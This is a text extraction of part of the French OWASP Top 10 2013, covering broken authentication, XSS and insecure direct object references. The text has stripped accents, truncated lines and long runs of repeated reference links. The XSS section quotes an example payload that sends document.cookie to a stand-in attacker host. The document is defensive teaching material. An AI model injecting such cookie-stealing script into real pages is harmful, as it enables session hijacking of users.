e.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttps://www.owasp.org/index.php/ESAPIhttps://www.owasp.org/index.php/ESAPIhttps://www.owasp.org/index.php/ESAPIhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.htmlhttps://www.owasp.org/index.php/ESAPIhttps://www.owasp.org/index.php/ESAPIhttps://www.owasp.org/index.php/ESAPIhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/77.htmlhttp://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)https://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/Command_Injectionhttp://www.owasp.org/index.php/Injection_Flaws5/26/2018 OWASP Top 10 - 2013 - French
8/22
SpcifiqueApplication
ExploitabilitMOYENNE
PrvalenceRPANDUE
DtectionMOYENNE
ImpactGRAVE
SpcifiquApplication/M
Considrez desattaquants externesanonymes, aussibien que desutilisateurslgitimes essayantde voler descomptes tiers.Considrez aussi lesutilisateurs internes
voulant camouflerleurs actes.
L'attaquant exploitedes fuites/faillesdans les fonctionsde gestion desessions etd'authentification(e.g. comptes, motsde passe, IDs desession) pourusurper lidentit
des utilisateurs.
Dvelopper correctement un systmed'authentification ou de gestion desessions est difficile. En consquence, cesschmas personnaliss ont souvent desfailles dans des domaines tels ladconnexion, la gestion de mots de passe,l'expiration de session, la fonction "sesouvenir de moi", la question secrte, lamise jour de compte, etc. Trouver detelles failles s'avre parfois difficile,
chaque implmentation tant unique.
De telles faillespermettraient lacompromissiondune partie voir detous les comptes.Une fois effectue,l'attaquant peutfaire tout ce que lavictime peut. Lescomptes
privilges sontsouvent cibls.
Considrer la Mtier des doou des fonctioapplicativesaffectes.
Considrez aul'impact commd unemdiatisation
vulnrabilit.
Exemple de scnarios dattaque
Scnario #1: Une application de rservation de billets d'avionexpose les identifiants de session dans l'URL par rcriture:
http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii
Un utilisateur authentifi sur le site veut informer ses amis dela vente. Il envoie le lien ci-dessus sans savoir qu'il fournitaussi son ID de session. En cliquant sur le lien, ses amisutiliseront sa session et sa carte de crdit.Scnario #2: Les timeouts de l'application ne sont pas dfiniescorrectement. Un utilisateur accde au site via un ordinateurpublic. Au lieu de slectionner "dconnexion", l'utilisateurferme simplement le navigateur et s'en va. Un attaquantutilise le mme navigateur une heure plus tard, et ce
navigateur est encore authentifi.Scnario #3: Un attaquant interne ou externe obtient unaccs la base des mots de passe du systme. Les mots depasse ne sont pas correctement chiffrs, exposant les motsde passe de tous les utilisateurs lattaquant.
Suis-je vulnrable?Les actifs de gestion de session comme les credentials et lesIDs sont-ils correctement protgs? Vous tes vulnrables si:
1. Dfaut de protection des credentials par hash ouchiffrement lors de leur stockage. Voir A6.
2. Faiblesse des fonctions de gestion de compte (ex:cration de compte, changement de mot de passe,rcupration de mot de passe, IDs de session faibles)permettant de deviner ou dcraserles credentials.
3. Exposition des IDs de session dans l'URL. (ex: rcriture)4. Vulnrabilit des IDs de session lattaquepar fixation.5. Pas de timeout des IDs de session ou mauvaise
dsactivation des sessions ou jetons dauthentification,en particulier SSO lors de la dconnexion.
6. Non rotation des IDs de session aprs connexion russie.7. Les mots de passe, IDs de session et autres credentials
transitent par des canaux non chiffrs. Voir A6.
Veuillez consulter les sections V2 et V3 de l'exigence ASVSpour plus de dtails.
Rfrences
OWASPPour plus de dtails sur les exigences et les problmviter dans ce domaine, voir les exigences de vrificASVS pour lAuthentification (V2) et la Gestion de Se(V3).
OWASP Authentication Cheat Sheet
OWASP Forgot Password Cheat Sheet
OWASP Session Management Cheat Sheet
OWASP Development Guide: Chapter on Authenticatio
OWASP Testing Guide: Chapter on Authentication
Externes
CWE Entry 287 on Improper Authentication
CWE Entry 384 on Session Fixation
Comment senprmunir?La recommandation premire pour une entreprise erendre accessible aux dveloppeurs:
1. Un ensemble unique de contrles d'authentificatde gestion de sessions. Ces contrles doivent veiller
a) satisfaire aux exigences de vrifid'authentification (V2) et de gestion de sessiodfinies dans le Standard de Vrification Scurit des Applications (ASVS)
b) proposer une interface simple aux dvelopPrendre comme exemple linterfaceAuthenticator et ses APIs utilisateur.
2. Un effort particulier doit tre accord la prventiofailles XSS, susceptibles d'tre utilises pour voleidentifiants de session. Voir A3.
A2 Violation de GestiondAuthentificationet de SessionVulnrabilit
VecteursdAttaque
ImpactsTechniques
ImpactsMtier
Agents de menace
https://www.owasp.org/index.php/Session_fixationhttps://www.owasp.org/index.php/Session_fixationhttps://www.owasp.org/index.php/ASVShttp://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/Authentication_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Testing_for_authenticationhttp://www.owasp.org/index.php/Command_Injectionhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.htmlhttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/384.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://cwe.mitre.org/data/definitions/287.htmlhttp://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Testing_for_authenticationhttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheethttps://www.owasp.org/index.php/Authentication_Cheat_Sheethttps://www.owasp.org/index.php/Authentication_Cheat_Sheethttps://www.owasp.org/index.php/Authentication_Cheat_Sheethttps://www.owasp.org/index.php/Authentication_Cheat_Sheethttps://www.owasp.org/index.php/Authentication_Cheat_Sheethttps://www.owasp.org/index.php/Authentication_Cheat_Sheethttps://www.owasp.org/index.php/Authentication_Cheat_Sheethttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttp://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/Session_fixation5/26/2018 OWASP Top 10 - 2013 - French
9/22
SpcifiqueApplication
ExploitabilitMOYENNE
PrvalenceTRES REPANDUE
DtectionFACILE
ImpactMODR
SpcifiquApplication/M
Considrezquelquunpouvanttransmettre desdonnes non fiableau systme, ycompris utilisateursexternes, interneset adminstrateurs.
Lattaquantenvoiedes scripts quiexploitentlinterprteurdansle navigateur. Toutesource de donnepeut tre unvecteur dattaqueycompris des sourcesinternes telles que
les donnes dunebase interne.
XSSest la faille la plus rpandue dans lesapplication web. Les failles XSS ont lieulorsquune application inclut des donnesfournies par lutilisateur dans une pageenvoye au navigateur, sans validation ouchappement correct de ce contenu. il enexiste troistypesconnus: 1)Stocke,2)Rflchie, et 3)XSS base sur DOM.
La dtection de la plupart des failles XSSest assez simple par test ou analyse decode.
Lattaquantpeutexcuter des scriptsdans le navigateurde la victime pourdtourner dessessions, dfigurerdes sites, insrer ducontenu hostile,redirigerlutilisateurvers un
site malveillant, etc.
Considrez la mtier du sysconcern ainslensemblededonnes quil
Considrezgalement l'imcommercial dexposition pude la vulnrab
Exemple de scnario dattaqueLapplication utilise des donnes non fiables dans laconstruction du fragment HTML sans lavoir valide ouchappe au pralable :
(String) page += "document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie'.
Cela provoque l'envoi de l'ID de session de la victime au site
web de l'attaquant, permettant l'attaquant de dtourner lasession en cours de l'utilisateur.A noter que les attaquants peuvent aussi utiliser XSS pourtromper les contremesures mises en place pour se protgerdes attaques CSRF. Voir A8 pour plus dinformationssur CSRF.
Suis-je vulnrable?Vous tes vulnrable si vous ne vous assurez pas que toutedonne transmise est correctement chappe ou quunevalidation a t ralise pour en contrler la fiabilit, ceciavant dtre incluse dans la page retourne au navigateur.Sans chappement ou validation adquate, une telle donnesera interprte comme du contenu excutable par lenavigateur. Si AJAX est utilis pour mettre--jourdynamiquement la page, utilisez-vous safe JavaScript?
Les outils automatiss peuvent identifier des failles XSS.Cependant, chaque application sa mthode de constructiondes pages et diffrents interprteurs peuvent tre utiliss surle navigateur tel que JavaScript, ActiveX, Flash ou Silverlight,ce qui rend la dtection automatique dlicate. Unecouverture complte ncessite ainsi une revue de code etdes tests de pntration en plus de loutil automatis.
Les technologies web 2.0 telles que AJAX rendent les faillesXSS plus difficiles dtecter via les outils automatiss.
Rfrences
OWASPOWASP XSS Prevention Cheat Sheet
OWASP DOM based XSS Prevention Cheat Sheet
OWASP Cross-Site Scripting Article
ESAPI Encoder API
ASVS: Output Encoding/Escaping Requirements (V6)
OWASP AntiSamy: Sanitization Library
Testing Guide: 1st 3 Chapters on Data Validation Testin
OWASP Code Review Guide: Chapter on XSS Review
OWASP XSS Filter Evasion Cheat SheetExternes
CWE Entry 79 on Cross-Site Scripting
Comment senprmunir?La protection contre XSS requiert une gestion des donon fiables spare du contenu du navigateur actif.
1. Loption privilgier est dchapper toute donnfiable selon le contexte HTML dans lequel elleinsre (corps, attribut, javascript, CSS ou URL, etc.OWASP XSS Prevention Cheat Sheet pour dinformationssur les techniques dchappement.
2. La validation positive des entres est recommandene constitue pas une protection suffisante en raisodiffrentes manires dont les applications traitencontenu. Une validation complte devra contrlongueur, les caractres, le format et les rgles mti
3. Pour les donnes complexes, considrez la liOWASPsAntiSamyou le Java HTML Sanitizer Projec
4. Considrez Content Security Policy (CSP) pouprotger des attaques XSS sur lensemblede votre s
A3 Cross-Site Scripting (XSS)Vulnrabilit
Vecteursdattaque
ImpactsTechniquesAgents de menace
ImpactsMtier
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)https://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/Cross-site_Scripting_(XSS)https://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdfhttps://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdfhttp://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/Cross-site_Scripting_(XSS)http://www.owasp.org/index.php/ESAPIhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.htmlhttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/AntiSamyhttps://www.owasp.org/index.php/Testing_for_Data_Validationhttps://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scriptinghttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheethttp://www.owasp.org/index.php/Command_Injectionhttp://cwe.mitre.org/data/definitions/79.htmlhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/AntiSamyhttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Projecthttps://www.owasp.org/index.php/AntiSamyhttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Projecthttps://www.owasp.org/index.php/Content_Security_Policyhttps://www.owasp.org/index.php/Content_Security_Policyhttps://www.owasp.org/index.php/Content_Security_Policyhttps://www.owasp.org/index.php/Content_Security_Policyhttps://www.owasp.org/index.php/Content_Security_Policyhttps://www.owasp.org/index.php/Content_Security_Policyhttps://www.owasp.org/index.php/Content_Security_Policyhttps://www.owasp.org/index.php/Content_Security_Policyhttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Projecthttps://www.owasp.org/index.php/AntiSamyhttps://www.owasp.org/index.php/AntiSamyhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://cwe.mitre.org/data/definitions/79.htmlhttp://cwe.mitre.org/data/definitions/79.htmlhttp://cwe.mitre.org/data/definitions/79.htmlhttp://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheethttps://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scriptinghttps://www.owasp.org/index.php/Testing_for_Data_Validationhttps://www.owasp.org/index.php/AntiSamyhttps://www.owasp.org/index.php/ASVShttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.htmlhttp://www.owasp.org/index.php/ESAPIhttps://www.owasp.org/index.php/Cross-site_Scripting_(XSS)https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdfhttps://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdfhttps://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdfhttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/DOM_Based_XSShttps://www.owasp.org/index.php/Cross-site_Scripting_(XSS)https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)5/26/2018 OWASP Top 10 - 2013 - French
10/22
SpcifiqueApplication
ExploitabilitFACILE
PrvalenceCOMMUNE
DtectionFACILE
ImpactMODR
SpcifiquApplication/M
Considrez lesdiffrents typesdutilisateurs devotre systme.Certains dentre euxont-ils un accslimit aux donnesen fonction de leurnature ?
L'attaquant, unutilisateur lgitime,substitue la valeurd'un paramtrefaisant rfrence un objet, par unerfrence unautre objet qui luiest interdit. Aura-t-ilaccs cette
ressource ?
Les applications incluent souvent lesidentifiants techniques des objets au seindes pages gnres (nom, cl, etc.). Lavrification des autorisations del'utilisateur avant accs aux objets nestpas systmatique. On parle dans ce cas derfrences directes non scurises. Il estfacile de dtecter cette vulnrabilit enmodifiant la valeur des paramtres lors detests. Lanalyse rapide du code peut aussi
dmontrer labsence de vrification.
Toutes les donnesrfrences par leparamtrevulnrable sontconcernes. Sauf sides rfrences nonprdictibles sontutilises, il est facilepour l'attaquantd'accder toutes
les ressources.
Considrez la marchande dedonnes expo
Considrezgalement limli la divulgade la vulnrabau grand pub
Exemple de scnario dattaqueLapplicationutilise une valeur non vrifie dans une requteSQL accdant des informations duncompte :
String query = "SELECT * FROM accts WHERE account = ?";
PreparedStatement pstmt =connection.prepareStatement(query , );
pstmt.setString( 1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery( );
Lattaquant modifie le paramtre acct dans sonnavigateur afin denvoyer le numro de compte quilsouhaite. Si le paramtre nest pas correctement vrifi,
lattaquant peut accder nimporte quel compte, au lieudtrelimit au sien.
http://example.com/app/accountInfo?acct=notmyacct
Suis-je vulnrable ?Le meilleur moyen de dterminer si une application estvulnrable aux rfrences directes non scurises est devrifier que toutes les rfrences vers un objet disposent desdfenses adaptes. Pour cela :
1. Pour les rfrences directes des ressources protges,lapplication choue-t-elle vrifier que lutilisateur estbien autoris accder la ressource demande ?
2. Pour les rfrences indirectes, lassociation vers la
rfrence directe stend-elle au-del des seules valeursautorises lutilisateuren question ?
Lanalyse du code applicatif permet de rapidement vrifierque lune ou lautre des techniques est bien employe. Laralisation de tests est galement efficace pour identifier lesrfrences directes et valuer leur scurit. Les outilsautomatiss ne cherchent pas identifier de tellesvulnrabilits puisquilssont incapables de reconnatre ce quirequiert une protection, ni mme ce qui est scuris ou non.
Rfrences
OWASPOWASP Top 10-2007 on Insecure Dir Object References
ESAPI Access Reference Map API
ESAPI Access Control API(voir isAuthorizedForData(),isAuthorizedForFile(), isAuthorizedForFunction() )
